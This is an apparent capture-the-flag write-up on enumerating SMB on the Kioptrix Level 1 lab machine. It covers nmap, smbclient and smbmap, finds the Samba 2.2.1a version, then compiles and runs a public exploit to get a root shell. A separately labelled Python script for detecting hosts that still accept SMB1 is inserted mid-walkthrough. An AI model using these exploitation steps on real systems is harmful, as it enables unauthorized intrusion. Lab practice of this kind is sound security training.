SMB Enumeration
SMB stands for Server Message Block. It is a protocol for sharing files and printers between computers, and by default it uses ports 139 and 445.
Port 139: SMB over NetBIOS, used for sharing files on a local network.
Port 445: SMB directly over TCP/IP, used for sharing files over an IP network.
For this enumeration I am using Kioptrix Level 1, whose SMB (Samba) version is vulnerable.
Our first priority is to identify that version, and there are many ways we can try to detect it.
Port scan
nmap -v -p- 192.168.129.237
Port 139 is open on this machine.
After confirming that the SMB port is open, the next step is to find the version:
nmap -v -p 139 -sC -sT -sV -A -O 192.168.129.237
nmap does not report the SMB version.
Using nc
nc -vv 192.168.129.237 139
nc does not show the version either.
Next we try the Enum4Linux script:
./Enum4LinuxPy.py -t 192.168.129.237 -a
This also shows no version information of any kind.
So we try to open a null session with smbclient:
smbclient -L //192.168.129.237
That returns an error, so we try another command, this time forcing the old NT1 (SMB1) dialect, which current smbclient builds refuse to negotiate by default:
smbclient //192.168.129.237/ --option='client min protocol=NT1'
Now the command shows us the list of shared folders, so we try to get into them:
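The NT1 option is needed because this old Samba only speaks SMB1, a dialect modern clients refuse unless told otherwise. The following Python script is an added example, not part of the original writeup: it sends a single SMB1 NEGOTIATE offering only the NT LM 0.12 dialect and reports whether a host still accepts SMB1, which is the check a defender would run to find hosts that still need SMB1 disabled. The target host is a command-line argument; the sample response bytes are constructed for the offline test, not captured from Kioptrix.

```python
import socket
import struct
import sys
# Offer only the NT LM 0.12 dialect, so any accepted dialect means SMB1 is on.
DIALECTS = [b"NT LM 0.12"]

def build_negotiate_request():
    """Build an SMB1 NEGOTIATE request wrapped in a NetBIOS session header."""
    body = b"".join(b"\x02" + d + b"\x00" for d in DIALECTS)
    # SMB1 header (32 bytes): magic, command 0x72, NTSTATUS, Flags, Flags2
    # (unicode | NT status | long names), PIDHigh, SecurityFeatures, Reserved,
    # TID, PIDLow, UID, MID
    header = struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", 0x72, 0, 0x18,
                         0xC001, 0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)
    smb = header + struct.pack("<BH", 0, len(body)) + body
    # NetBIOS session message: type 0x00 followed by a 3-byte big-endian length
    return struct.pack(">I", len(smb)) + smb

def parse_negotiate_response(data):
    """Return the dialect index the server chose (0xFFFF = none accepted),
    or None if the reply is not a successful SMB1 NEGOTIATE response."""
    if len(data) < 4 + 32 + 3:
        return None
    smb = data[4:]
    if smb[:4] != b"\xffSMB" or smb[4] != 0x72:
        return None
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    if status != 0 or word_count == 0:
        return None
    return struct.unpack_from("<H", smb, 33)[0]

def smb1_enabled(host, port=445, timeout=5.0):
    """True if the host answers the NT LM 0.12 offer with an accepted dialect."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_negotiate_request())
            data = sock.recv(4096)
    except OSError:
        return False  # closed, reset or timed out: SMB1 treated as not offered
    index = parse_negotiate_response(data)
    return index is not None and index != 0xFFFF

# Constructed sample reply (not a real capture): SMB1 NEGOTIATE response with
# status 0, WordCount 17 and DialectIndex 0, i.e. the server accepted NT LM 0.12.
SAMPLE_RESPONSE = (struct.pack(">I", 35) + b"\xffSMB\x72" + b"\x00" * 4 +
                   b"\x98" + b"\x01\xc0" + b"\x00" * 14 + b"\xff\xfe" +
                   b"\x00" * 4 + b"\x11" + b"\x00\x00")

if __name__ == "__main__":
    print("SMB1 enabled" if smb1_enabled(sys.argv[1]) else "SMB1 not offered")
```

A host that has SMB1 disabled usually resets the connection or answers with no accepted dialect, and both cases report "SMB1 not offered".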
smbclient -N //192.168.129.237/ADMIN$
Login fails.
smbmap -H 192.168.129.237
After trying all these different methods we still have no version info.
Now I use Metasploit's SMB version scanner to get the version.
Here we get the version: Samba 2.2.1a.
Search for an exploit matching this version; the exploit link is here.
The exploit is written in C, so download it and compile it:
gcc 10.c -o 10
Assign execute permission:
chmod +x 10
After compiling, run the exploit:
./10 -b -c 192.168.129.237
-b is for brute force, -c for the IP.
Now we get a root shell.